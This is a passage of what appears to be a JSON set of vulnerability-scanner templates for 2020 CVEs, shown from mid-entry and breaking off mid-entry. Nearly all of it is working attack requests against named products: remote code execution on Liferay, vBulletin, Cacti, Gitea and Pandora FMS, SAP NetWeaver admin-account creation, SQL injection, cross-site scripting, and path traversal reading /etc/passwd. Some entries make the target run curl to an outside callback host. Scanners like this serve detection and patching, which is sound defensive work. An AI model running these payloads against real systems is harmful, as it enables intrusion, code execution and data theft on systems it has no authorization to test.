{{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"nonexistent_function\"\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_1","regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_1","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_2","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]}]}]},{"id":"CVE-2020-13851","info":{"name":"Artica Pandora FMS 7.44 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["text/html","PHPSESSID="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14144","info":{"name":"Gitea 1.1.0 - 1.12.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["Gitea:"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-15129","info":{"name":"Traefik - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"X-Forwarded-Prefix":"https://foo.nl"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"https://foo.nl/dashboard/\">Found</a>"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-24912","info":{"name":"QCube Cross-Site-Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/assets/_core/php/profile.php","{{BaseURL}}/assets/php/profile.php","{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"],"body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('xss')</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]}]}]},{"id":"CVE-2020-24148","info":{"name":"Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Import XML feed"]}]},{"raw":["POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-24571","info":{"name":"NexusDB <4.50.23 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17463","info":{"name":"Fuel CMS 1.4.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\n\nuser_name={{username}}&password={{password}}&Login=Login&forward=\n","@timeout: 10s\nGET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["duration>=6","status_code_3 == 200","contains(body_1, \"FUEL CMS\")"],"condition":"and"}]}]},{"id":"CVE-2020-36510","info":{"name":"WordPress 15Zine <3.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/themes/15zine/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/15zine/assets/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6287","info":{"name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","severity":"critical"},"requests":[{"raw":["POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>\n  CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CTCWebServiceSi","SOAP-ENV"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11530","info":{"name":"WordPress Chop Slider 3 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/javascript\")","contains(body, \"$(document).ready(function()\")"],"condition":"and"}]}]},{"id":"CVE-2020-8813","info":{"name":"Cacti v1.2.8 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /graph_realtime.php?action=init HTTP/1.1\nHost: {{Hostname}}\nCookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-2036","info":{"name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","severity":"high"},"requests":[{"raw":["GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body_1), '<svg/onload=alert(document.domain)>')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(document.domain)>')","status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(document.domain)>')"],"condition":"or"}]}]},{"id":"CVE-2020-27866","info":{"name":"NETGEAR - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Debug Enable!"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8641","info":{"name":"Lotus Core CMS 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6637","info":{"name":"OpenSIS 7.3 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/account/index.php","{{BaseURL}}/opensis/index.php","{{BaseURL}}/index.php"],"body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQL STATEMENT:","<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13483","info":{"name":"Bitrix24 <=20.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>","{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"/*\">*/)});function __MobileAppList(){alert(1)}//","function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7961","info":{"name":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/jsonws/invoke HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\ncmd2: {{command}}\n\ncmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n"],"payloads":{"command":["systeminfo","lsb_release -a"]},"matchers-condition":"and","matchers":[{"type":"regex","regex":["OS Name:.*Microsoft Windows","Distributor ID:"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Microsoft Windows (.*)","Distributor ID: (.*)"],"part":"body"}]}]},{"id":"CVE-2020-6950","info":{"name":"Eclipse Mojarra - Local File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/xml\")","contains_all(body, \"<web-app\", \"<servlet>\") || contains_all(body, \"<faces-config\", \"</faces-config>\")"],"condition":"and"}]}]},{"id":"CVE-2020-28185","info":{"name":"TerraMaster TOS < 4.2.06 - User Enumeration","severity":"medium"},"requests":[{"raw":["GET /tos/index.php?user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /wizard/initialise.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/tos/index.php?user/login\n\ntab=checkuser&username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"status\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body_2","regex":["\"username\":\"(.*?)\"","\"email\":\"(.*?)\""]}]}]},{"id":"CVE-2020-11110","info":{"name":"Grafana <= 6.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nReferer: {{BaseURL}}\ncontent-type: application/json\nConnection: close\n\n{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"gnetId\":null,\"graphTooltip\":0,\"id\":null,\"links\":[],\"panels\":[],\"schemaVersion\":18,\"snapshot\":{\"originalUrl\":\"javascript:alert('Revers3c')\",\"timestamp\":\"2020-03-30T01:24:44.529Z\"},\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":null,\"to\":\"2020-03-30T01:24:53.549Z\",\"raw\":{\"from\":\"6h\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Dashboard\",\"uid\":null,\"version\":0},\"name\":\"Dashboard\",\"expires\":0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"deleteKey\":","\"deleteUrl\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"url\":\"([a-z:/0-9A-Z]+)\""],"part":"body"}]}]},{"id":"CVE-2020-10220","info":{"name":"rConfig 3.9 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23575","info":{"name":"Kyocera Printer d-COPIA253MF - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:.*:0:0:","bin:.*:1:1"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13167","info":{"name":"Netsweeper <=6.4.3 - Python Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5","{{BaseURL}}/webadmin/out"],"headers":{"Referer":"{{BaseURL}}/webadmin/admin/service_manager_data.php"},"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{rand_str}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35986","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-17496","info":{"name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13820","info":{"name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus='alert(document.domain)","Extreme Management Center"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28976","info":{"name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/canto/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Canto","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["null"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24312","info":{"name":"WordPress Plugin File Manager (wp-file-manager) Backup Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of","wp-content/uploads/wp-file-manager-pro/fm_backup","backup_"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9376","info":{"name":"D-Link DIR-610 Devices - Information Disclosure","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>Admin</name>","</usrid>","</password>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-4463","info":{"name":"IBM Maximo Asset Management Information Disclosure - XML External Entity 